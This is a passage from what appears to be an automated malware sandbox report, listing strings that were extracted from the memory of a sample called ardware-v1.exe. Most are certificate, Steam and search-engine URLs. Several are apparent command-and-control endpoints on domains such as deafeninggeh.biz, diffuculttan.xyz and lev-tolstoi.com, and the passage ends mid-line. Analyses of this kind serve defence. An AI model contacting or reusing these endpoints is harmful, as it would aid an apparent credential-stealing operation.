                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152923303.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220218856.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: ardware-v1.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                Source: ardware-v1.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: ardware-v1.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
                Source: ardware-v1.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: ardware-v1.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                Source: ardware-v1.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com0
                Source: ardware-v1.exeString found in binary or memory: http://ocsp.sectigo.com00
                Source: ardware-v1.exeString found in binary or memory: http://ocsps.ssl.com0?
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: ardware-v1.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apii
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastJ
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.ste
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/publ
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&a
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: ardware-v1.exe, 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152923303.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121904160.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121509766.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121039700.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3153091558.0000000000B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstb
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/PK
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api1
                Source: ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: ardware-v1.exe, 00000000.00000003.2934962608.0000000000A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/
                Source: ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001707867.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/BVC$O
                Source: ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/S$_
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152694533.000000000358C000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199578704.0000000003596000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3122120074.0000000003598000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3119331839.0000000003598000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219548892.0000000003597000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220218856.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 